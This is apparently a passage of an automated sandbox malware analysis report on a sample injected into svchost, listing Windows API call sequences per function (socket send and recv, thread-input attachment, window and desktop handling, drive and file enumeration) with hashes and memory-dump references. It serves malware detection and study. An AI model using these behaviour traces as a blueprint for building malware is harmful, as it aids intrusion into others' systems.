• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
Yara matches
Similarity
• API ID: QueryVirtual$ErrorLast
• String ID:
• API String ID: 2886163261-0
APIs
• WideCharToMultiByte.KERNEL32(00000000,00000000,02650AA8,000000FF,00000000,00000000,00000000,00000000,76F8F380,?,?,02650AA8,?), ref: 0265AA37
• GetProcessHeap.KERNEL32(00000008,00000013,00000000,?,02650AA8,?), ref: 0265AA54
• HeapAlloc.KERNEL32(00000000,?,02650AA8,?), ref: 0265AA5B
• memset.MSVCRT ref: 0265AA6B
• WideCharToMultiByte.KERNEL32(00000000,00000000,02650AA8,000000FF,00000000,00000000,00000000,00000000,?,02650AA8,?), ref: 0265AA88
Memory Dump Source
• Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
Yara matches
Similarity
• API ID: ByteCharHeapMultiWide$AllocProcessmemset
• String ID:
• API String ID: 913929354-0
APIs
• GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02646C1A
• HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02646C21
• memset.MSVCRT ref: 02646C35
• lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02646C4E
• RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02646C5C
Memory Dump Source
• Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
Yara matches
Similarity
• API ID: Heap$AllocCloseProcesslstrcpynmemset
• String ID:
• API String ID: 3057210225-0
APIs
• GetProcessHeap.KERNEL32(00000000,?,761E23A0,?,?), ref: 0265998D
• HeapFree.KERNEL32(00000000), ref: 02659994
• recv.WS2_32(?,?,00000400,00000000), ref: 026599AF
• send.WS2_32(?,?,00000000,00000000), ref: 026599C0
• recv.WS2_32(?,?,00000400,00000000), ref: 026599D9
Memory Dump Source
• Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
Yara matches
Similarity
• API ID: Heaprecv$FreeProcesssend
• String ID:
• API String ID: 2415998009-0
APIs
• OpenProcess.KERNEL32(00000410,00000000), ref: 0264D242
• GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 0264D259
• GetHandleInformation.KERNEL32(00000000,00000000), ref: 0264D26F
• CloseHandle.KERNEL32(00000000), ref: 0264D280
• ExtractIconExA.SHELL32(?,00000000,?,00000000,00000001), ref: 0264D297
Memory Dump Source
• Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
Yara matches
Similarity
• API ID: Handle$CloseExtractFileIconInformationModuleNameOpenProcess
• String ID:
• API String ID: 1270303404-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?,?,00000000,76F93080,?,0264922C,?,00000006,00000000), ref: 0264E38C
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000005), ref: 0264E3A3
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 0264E3A6
                                                                                                                                                                                                              • SendMessageA.USER32(00000000,00000006,?,0264922C), ref: 0264E3BD
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000003), ref: 0264E3C2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              • API ID: Window$DesktopMessageSendThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3855296974-0
                                                                                                                                                                                                              • Opcode ID: 66fb96d5f76c955725325b52f4d213e248e8e465618f5474e1640f51909801e1
                                                                                                                                                                                                              • Instruction ID: 0e80fae6bef2bee3216e553d63f2c87e00640b689b0809f0ba6f76d77f7ff4a2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66fb96d5f76c955725325b52f4d213e248e8e465618f5474e1640f51909801e1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9F08976A416187FD721DB55DC44E5F779CDBC8760F014605FD0197340D6B0EC508AB0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0264D2BC
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0264D2C4
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0264D2D0
                                                                                                                                                                                                              • SendMessageA.USER32(?,0000000D,?,?), ref: 0264D2E1
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 0264D2ED
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              • API ID: Thread$AttachInput$CurrentMessageProcessSendWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2643679612-0
                                                                                                                                                                                                              • Opcode ID: d1ed42da672b92665bceedb6641907bf11a6b960e0243e1cf81db039ae3852b6
                                                                                                                                                                                                              • Instruction ID: 9d94f315dba0a42ec9887c3eaffd09729fe42690f9e4f97a1b294cc189cbc85a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1ed42da672b92665bceedb6641907bf11a6b960e0243e1cf81db039ae3852b6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6F03072681204BFD3105BA5EC8DFAFBF6CEB49762F515916FA06D7241CAB0986087B0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0264E34A
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0264E352
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,02649F24,?,?,?,?,02649400,?,?), ref: 0264E364
                                                                                                                                                                                                              • GetFocus.USER32 ref: 0264E366
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,02649F24,?,?,?,?,02649400,?,?), ref: 0264E373
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              • API ID: Thread$AttachInput$CurrentFocusProcessWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 968181190-0
                                                                                                                                                                                                              • Opcode ID: 90a14ee3596832ed65da4886112b5d268a7f4084093bb3300c77f340b8e08cbb
                                                                                                                                                                                                              • Instruction ID: b415eff388ca7ff98512ff4cb5c9803470feecde0cf44f863732d3a46031d01b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90a14ee3596832ed65da4886112b5d268a7f4084093bb3300c77f340b8e08cbb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5E09231E80304BBD71057A6AC8DFAFBF6CEB857A2F910555FA0AD3240D9719C5086B4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • malloc.MSVCRT ref: 026713F9
                                                                                                                                                                                                              • realloc.MSVCRT ref: 02671405
                                                                                                                                                                                                              • malloc.MSVCRT ref: 026714AC
                                                                                                                                                                                                              • realloc.MSVCRT ref: 026714B8
                                                                                                                                                                                                                • Part of subcall function 02670EA0: __WSAFDIsSet.WS2_32(?,?), ref: 02670F50
                                                                                                                                                                                                                • Part of subcall function 02670EA0: closesocket.WS2_32(?), ref: 02670F6D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              • API ID: mallocrealloc$closesocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 403730927-0
                                                                                                                                                                                                              • Opcode ID: 2355fb6ad8014bb13bbd72be89a6a84084b015642a59fd24907da347cb318e48
                                                                                                                                                                                                              • Instruction ID: 74278bfbc461baf62be18bf2f86d6e0769251ba2fddbcea642e0bc588248e7f9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2355fb6ad8014bb13bbd72be89a6a84084b015642a59fd24907da347cb318e48
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8B1B572E006058FCB08CF28DD90AE937A6EF95301F1985BAED0D9F345D774A951CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              • API ID: fwrite$fseek
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3883414211-0
                                                                                                                                                                                                              • Opcode ID: 21c27f2b50f93450bc7f3e4e24ca9eca3b5e1befa845b2f485ba72d708c769c2
                                                                                                                                                                                                              • Instruction ID: 373923f8951b06de1fdc9f97a1837e01725a5fe4926620675df57b31a8615a65
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21c27f2b50f93450bc7f3e4e24ca9eca3b5e1befa845b2f485ba72d708c769c2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B621D270A407059FD720CFA8CC81BAEBBF5EF98300F04896DE485E7781D274A980CB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02652392
                                                                                                                                                                                                              • GetParent.USER32(?), ref: 0265239E
                                                                                                                                                                                                              • GetWindowTextW.USER32(00000000,?,00000104), ref: 026523B5
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 026523D6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              • API ID: ParentTextWindowmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4175915554-0
                                                                                                                                                                                                              • Opcode ID: 9f8d0f980bff0ee1f61f018c8dfc139a9bbd90827e5cb74e3052835de4318b7d
                                                                                                                                                                                                              • Instruction ID: 28817653993f9ea6cf789ed37476498517b3acf737764c421342da24ab239f61
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f8d0f980bff0ee1f61f018c8dfc139a9bbd90827e5cb74e3052835de4318b7d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8014573B4032467D7209EA8ACC8A9BB36CAB10604F40437AFE09E3201EA71D99086E1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000020,00000000,-00000010,?,0264432B,?), ref: 0264409C
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,0264432B,?), ref: 026440A3
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 026440E2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocProcess_snprintf
                                                                                                                                                                                                              • String ID: %d.%d.%d.%d
                                                                                                                                                                                                              • API String ID: 1060465051-3491811756
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TerminateThread.KERNEL32(00000000,00000000,?,?,02658BDE,00000000,02650BE3,?,?,?,?,?,?), ref: 0265B8A0
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0265B740,00000000,00000000,00000000), ref: 0265B8B5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,02650BE3,00000000,?,?,02658BDE,00000000), ref: 0265B8D3
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,02658BDE,00000000), ref: 0265B8E4
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleThread$CloseCreateInformationTerminate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1825730051-0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: private$public
                                                                                                                                                                                                              • API String ID: 0-4176808989
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick_snprintf
                                                                                                                                                                                                              • String ID: %dd %dh %dm
                                                                                                                                                                                                              • API String ID: 3495410349-3074259717
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 0265E6B0: memset.MSVCRT ref: 0265E6CF
                                                                                                                                                                                                                • Part of subcall function 0265E6B0: memset.MSVCRT ref: 0265E6F1
                                                                                                                                                                                                                • Part of subcall function 0265E6B0: GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 0265E706
                                                                                                                                                                                                                • Part of subcall function 0265E6B0: SetErrorMode.KERNEL32(00000001), ref: 0265E71F
                                                                                                                                                                                                                • Part of subcall function 0265E6B0: GetDriveTypeA.KERNEL32(?), ref: 0265E768
                                                                                                                                                                                                                • Part of subcall function 0265E6B0: SetCurrentDirectoryA.KERNEL32(?), ref: 0265E77B
                                                                                                                                                                                                                • Part of subcall function 0265E6B0: FindFirstFileA.KERNEL32(?,?), ref: 0265E7DD
                                                                                                                                                                                                                • Part of subcall function 0265E6B0: SetErrorMode.KERNEL32(?), ref: 0265EAF3
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A63B), ref: 0265EB0B
                                                                                                                                                                                                                • Part of subcall function 026539D0: EnterCriticalSection.KERNEL32(0268FB68,76F90F00,00000000,76F92F00), ref: 026539E9
                                                                                                                                                                                                                • Part of subcall function 026539D0: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 026539FB
                                                                                                                                                                                                                • Part of subcall function 026539D0: _snprintf.MSVCRT ref: 02653A1B
                                                                                                                                                                                                                • Part of subcall function 026539D0: SetCurrentDirectoryA.KERNEL32(?), ref: 02653A2B
                                                                                                                                                                                                                • Part of subcall function 026539D0: PathAddBackslashA.SHLWAPI(?), ref: 02653B00
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentDirectory$BackslashDriveErrorModePathmemset$CriticalEnterFileFindFirstLogicalSectionStringsType_snprintf
                                                                                                                                                                                                              • String ID: 8A99A63B$COLV
                                                                                                                                                                                                              • API String ID: 2461973751-2008761856
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: malloc$free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1480856625-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000014,00000000,?,?,?,0264EF5B,00000000,?,?,00000000,Content-Type,?,?,00000000,Referer), ref: 0264EB1F
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,0264EF5B,00000000,?,?,00000000,Content-Type,?,?,00000000,Referer,?), ref: 0264EB26
                                                                                                                                                                                                              • memset.MSVCRT ref: 0264EB36
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,00000014,?,0264EF5B,00000000,?,?,00000000,Content-Type,?,?,00000000), ref: 0264EB41
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 471586229-0
                                                                                                                                                                                                              • Opcode ID: 4aa42d2240c8b511050c1e6db9fa986fa0a119d788ebc6d92d33e719687abb43
                                                                                                                                                                                                              • Instruction ID: 30565708e0fadad7504727006370601ea65a54f9f6612b5af108558572014038
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4aa42d2240c8b511050c1e6db9fa986fa0a119d788ebc6d92d33e719687abb43
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9012B336006156BD7109A689C84FABB7DCBF46760B054701FD46CB280EF22E904C3E0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,0264FA2B,?,?,?), ref: 0264F388
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,0264FA2B,?,?,?), ref: 0264F38F
                                                                                                                                                                                                              • memset.MSVCRT ref: 0264F39F
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?,?,0264FA2B,?,?,?), ref: 0264F3AA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 471586229-0
                                                                                                                                                                                                              • Opcode ID: d8e15389836ec57e5fbf111d720d65708dd23c55e9d51d1e090a444142fd75ab
                                                                                                                                                                                                              • Instruction ID: fcfc2cfaf8c56a607bf6048164ec52e763f1b75c4e2aee92e46c145640fbe4c3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d8e15389836ec57e5fbf111d720d65708dd23c55e9d51d1e090a444142fd75ab
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72F0E533A0161177D7216AA99C84F8F775CEF86764F414714FE04EB281DE24D81087F5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02684145
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02684148
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02684155
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02684158
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1670920773-0
                                                                                                                                                                                                              • Opcode ID: d5d89577a44ada35ca739d47cab8698a53907354775fa709c88cb0aa03da6b8d
                                                                                                                                                                                                              • Instruction ID: 5eaeebfcf463271452c82bac82b869153f4d1bd45388fd235f8feaf75a9e7ac0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5d89577a44ada35ca739d47cab8698a53907354775fa709c88cb0aa03da6b8d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BEE08C32A4122873C6203AA66C08FAFBF1CEF91B61F428611F60AA32408A619410C6F1